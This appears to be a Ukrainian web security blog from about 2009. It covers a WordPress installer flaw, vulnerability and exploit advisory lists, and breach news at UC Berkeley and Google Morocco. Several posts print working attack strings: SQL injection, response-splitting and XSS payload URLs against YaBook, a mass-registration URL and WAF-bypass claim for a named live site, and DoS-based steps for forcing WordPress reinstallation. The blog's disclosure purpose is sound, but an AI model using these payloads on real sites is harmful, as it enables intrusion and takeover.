Websecurity - Веб безпека

Нещодавно я писав про Abuse of Functionality уразливість в WordPress. Яку виявив Jeff Starr, власник сайта perishablepress.com, коли в нього на сервері відбувся сбій MySQL. До неї уразливі всі версії движка - WordPress 2.7.1 та попередні версії.

Я знаходив чимало уразливостей в WordPress і його плагінах, але на можливість цієї уразливості я не звернув уваги (мабуть тому, що завжди видаляю інсталяційні файли після інсталяції ). Зате на це звернув увагу Jeff, коли в нього виникли проблеми на сайті. До речі, в своєму записі Important Security Fix for WordPress Jeff навів декілька рекомендацій по виправленню цієї уразливості.

Дана уразливість пов’язана з інсталяційними файлами, якщо вони знаходяться на сервері. І я розробив декілька варіантів атаки на дану Abuse of Functionality уразливість в WordPress.

Як я писав, інсталятор WP повинен перевіряти, чи не встановлений движок. І якщо він встановлений, то виводити відповідне повідомлення. Але у випадку, коли має місце збій MySQL, він цього не перевіряє і дає переінстялювати движок.

Зокрема, як зазначив Jeff, у випадку коли database (що вказана в налаштуваннях WP) повністю відсутня, то інсталятор WP думає, що движок не встановлений і виводить інсталяційний діалог. Також, під час досліджень, я виявив можливість інших варіантів атаки.

Можна атакувати сайт навіть коли є database движка і присутній зв’язок з MySQL, але при цьому є збій в одній з таблиць WP (яку перевіряє інсталятор). Зокрема, атака можлива коли пошкоджена таблиця wp_options (в WordPress 2.6.2), або wp_users (в WordPress 2.0.3 та 2.0.11). Тобто в різних версіях WP різні таблиці є головними при перевірці в інсталяторі - це може бути або таблиця wp_options або wp_users (наврядчи ще якась інша таблиця буде головною для інсталятора в інших версіях WP).

Варіанти атаки на сайт на WordPress (на якому міститься інсталятор):

1. У випадку, коли на сайті відбувся подібний збій з MySQL і виведиться діалог інсталятора, то можна атакувати сайт. Враховуючи, що це дуже малоімовірно, і потрібно ще зафіксувати час даного збою, то варто використати інший варіант атаки.

2. Зробити DoS атаку на MySQL для атаки на WordPress. За рахунок DoS атаки відбудеться збій при зв’язку з MySQL і потенційно інсталятор може вивести діалог інсталяції. Хоча в більшості випадків зв’язок з СУБД буде повністю відсутній й інсталятор виведе відповідне повідомлення.

3. За рахунок автоматизованої атаки на MySQL (через Insufficient Anti-automation уразливості в WP) можна призвести до збою в одній з головних таблиць (що також є DoS атакою). І в такому разі спрацює інсталятор движка.

Зокрема для WordPress 2.0.x та інших версій движка, де інсталятор перевіряє wp_users, цього можна добитися через автоматизовану реєстрацію користувачів. Якщо активно реєструвати користувачів на сайті, може виникнути збій в таблиці wp_users і відповідно движок не зможе її прочитати і виведе діалог інсталятора.

P.S.

Зробив відео демонстрацію DoS атаки на WordPress.

В даній добірці уразливості в веб додатках:

• blur6ex-0.3.462 LOCAL FILE INCLUSION Vulnerbility (деталі)
• Two heap overflow in Foxit WAC Server 2.0 Build 3503 (деталі)
• Maian Search v1.1 Multiple Vulnerabilities (XSS/SQL INJECTION) (деталі)
• Maian Gallery v2.0 XSS Vulnerability (деталі)
• Maian Guestbook v3.2 XSS Vulnerabilities (деталі)
• Maian Weblog v4.0 XSS Vulnerabilities (деталі)
• Maian Greeting v2.1 Multiple Vulnerabilities (XSS/SQL INJECTION) (деталі)
• Mozilla Foundation Security Advisory 2007-36 (деталі)
• Mozilla Foundation Security Advisory 2007-38 (деталі)
• Mozilla Foundation Security Advisory 2007-39 (деталі)

Як повідомив blogsecurity.net, нещодавно була знайдена Abuse of Functionality уразливість в WordPress. Уразливі WordPress 2.7.1 та попередні версії.

Уразливість пов’язана з інсталяційними файлами, якщо вони знаходяться на сервері (якщо ви їх не видалили, що завжди рекомендується робити після інсталяції). Дану уразливість виявив власник сайта perishablepress.com, коли в нього на сервері відбувся сбій MySQL.

При відсутності зв’язку з СУБД, WordPress повинен видавати стандарте повідомлення про помилку. Так він робив завжди в усіх версіях (зокрема в 2.x). Але як виявилось, в тому випадку, коли є збій MySQL (наприклад, коли пошкоджені таблиці движка) і при цьому інсталяційні файли WP є на сервері, то WordPress гадає, що движок ще не був встановлений і виводить інсталяційний діалог.

Істалятор WP повинен перевіряти, чи не встановлений движок. І якщо він встановлений, то виводити відповідне повідомлення. Але в даному рідкому випадку, коли має місце збій MySQL, він цього не перевіряє і дає переінстялювати движок.

Для цього лише потрібно ввести назву сайта і емайл, після чого движок буде оновлений. І відповідно створений новий акаунт адміна, що дозволить похакати сайт. З чим і стикнувся власник сайта perishablepress.com, коли ледве відбився (бо вчасно виявив проблему) від бажаючих переінсталювати движок на його сайті .

• WordPress Install Files Security Risk (деталі)

Хакери проникнули в комп’ютерну мережу Каліфорнійського університету в Берклі. У руках зловмисників можуть виявитися особисті дані більш ніж 160 тисяч чоловік.

За словами представників університету, хакерам удалося проникнути в комп’ютери медичної служби. Серед особистих даних співробітників і студентів університету, що зберігаються в цих комп’ютерах, є номера соціального страхування, але не історії хвороби. Останні зберігаються на комп’ютерах, що не були взломані.

Уперше хакери підключилися до комп’ютерів університету в жовтні 2008 року. У квітні 2009 року проникнення було виявлено і ліквідоване. Передбачається, що зловмисники взламували комп’ютери із-за меж США, можливо, з Китаю.

Усі ті, чиї особисті дані можуть виявитися в зловмисників, будуть проінформовані про це. Каліфорнійський університет у Берклі пообіцяв посилити міри безпеки, для недопущення таких інцидентів у майбутньому.

По матеріалам http://proua.com.

P.S.

Із року в рік таких інцедентів стає все більше. Коли взламуються комп’ютери різних установ, зокрема навчальних закладів, і викрадаються особисті дані людей. Причому найбільше таких інцедентів трапляється саме в США (як мінімум вони про це офіційно повідомляють).

21.01.2009

В лютому, 17.02.2008, я знайшов SQL Injection, Redirector, HTTP Response Splitting та Information Leakage уразливості, а сьогодні ще й Full path disclosure в YaBook. Це гостьова книга. Дірки виявив на сайті розробника YaBook. Про що найближчим часом повідомлю розробнику веб додатку.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробнику додатку.

16.05.2009

SQL Injection:

http://site/guestbook/index.php?action=jump&id=-1%20union%20select%20version()

Redirector (через SQL Injection):

http://site/guestbook/index.php?action=jump&id=-1%20union%20select%20'http://websecurity.com.ua'

HTTP Response Splitting (через SQL Injection):

http://site/guestbook/index.php?action=jump&id=-1%20union%20select%20'%0AContent-Type:html%0A%0A%3Cscript%3Ealert(document.cookie)%3C/script%3E'

Працює на старих версіях PHP.

Information Leakage:

http://site/guestbook/index.php

В meta-тегах виводиться інформація про версію PHP, MySQL і веб сервера.

Full path disclosure:

http://site/guestbook/config.inc.php

Full path disclosure (через SQL Injection):

http://site/guestbook/index.php?action=jump&id=-1%20union%20select%20'%0A1'

Уразлива версія YaBook 0.98.1-alpha та попередні версії.

В версії YaBook 0.98.2-alpha автор виправив дані уразливості.

В даній добірці експлоіти в веб додатках:

• Mole Group Rental Script (Auth Bypass) SQL Injection Vuln (деталі)
• PHP Auto Listings Script (Auth Bypass) SQL Injection Vuln (деталі)
• SpeedStream 5200 Authentication Bypass Config Download Vulnerability (деталі)
• Myiosoft EasyBookMarker v4 (Parent) SQL Injection Vulnerability (деталі)
• Domain Seller Pro 1.5 (id) Remote SQL Injection Vulnerability (деталі)
• Mambo Component n-form (form_id) Blind SQL Injection Exploit (деталі)
• V3 Chat - Profiles/Dating Script 3.0.2 Insecure Cookie Handling Vuln (деталі)
• ZEEJOBSITE 2.0 Remote File Upload Vulnerability (деталі)
• V3 Chat Profiles/Dating Script 3.0.2 (Auth Bypass) SQL Injection Vuln (деталі)
• 2WIRE DSL Router (xslt) Denial of Service Vulnerability (деталі)
• Enthusiast 3.1.4 (show_joined.php path) Remote File Inclusion Vuln (деталі)
• zeeproperty 1.0 (Upload/XSS) Multiple Remote Vulnerabilities (деталі)
• MemHT Portal <= 4.0 Remote Code Execution Exploit (деталі)
• GE Proficy Real Time Information Portal Credentials Leak Sniffer (meta) (деталі)
• Exploits SiteXS CMS Remote File Upload Vulnerability (деталі)

У липні, 19.07.2008, я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості на сайті http://www.s-cars.org. Про що найближчим часом сповіщу адміністрацію сайта. Дані уразливості в PostNuke Phoenix, про які я писав раніше.

Insufficient Anti-automation:

http://www.s-cars.org/postnuke/user.php?uname=test&pass=12345&vpass=12345&email=test@test.com&vemail=test@test.com&agreetoterms=1&module=NS-NewUser&op=finishnewuser

XSS:

• alert(document.cookie)
• цікавий

На сайті використовується WAF, який я легко обійшов. За допомогою self-contained XSS.

В своїй презентації Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise, Shreeraj Shah розповідає про атаки на веб додатки, що використовують AJAX та веб сервіси. Про появу нових видів веб атак, характерних для Web 2.0.

У суботу, 9 травня, хакери з угруповання PAKbugs взломали марокканський сайт Google - Google.co.ma. Робота ресурсу була відновлена через кілька годин після взлому.

Відповідне повідомлення, а також посилання на сайт PAKbugs, були розміщені хакерами, орієнтовно пакистанцями, на головній сторінці марокканського сайта Google.

Для взлому сайта Google хакери атакували сервери компанії, що керує DNS-адресами в Марокко. Це дозволило зловмисникам поміняти DNS-адресу Google.co.ma, у результаті чого користувачі не могли потрапити на сайт пошуковця.

Повідомляється, що це не перший такий інцидент у поточному році. Місяцем раніше аналогічним чином були взломані сайти Google в Алжиру і Пуерто-Ріко.

По матеріалам http://proua.com.

В даній добірці уразливості в веб додатках:

• BlackBook v1.0 Multiple XSS Vulnerabilities (деталі)
• vlBook 1.21 (ALL VERSION) Multiple Remote Vulnerabilities (LFI/XSS) (деталі)
• mjguest 6.7 (ALL VERSION) Xss & Redirection Vuln (деталі)
• php-addressbook v2.0 Multiple Remote Vulnerabilities (LFI/XSS) (деталі)
• SiteXS CMS Remote File Upload Vulnerability (деталі)
• Fixed: LiveCart SQL injection vulnerability fixed since version 1.1.2 (деталі)
• Mozilla Foundation Security Advisory 2007-32 (деталі)
• Mozilla Foundation Security Advisory 2007-33 (деталі)
• Mozilla Foundation Security Advisory 2007-34 (деталі)
• Mozilla Foundation Security Advisory 2007-35 (деталі)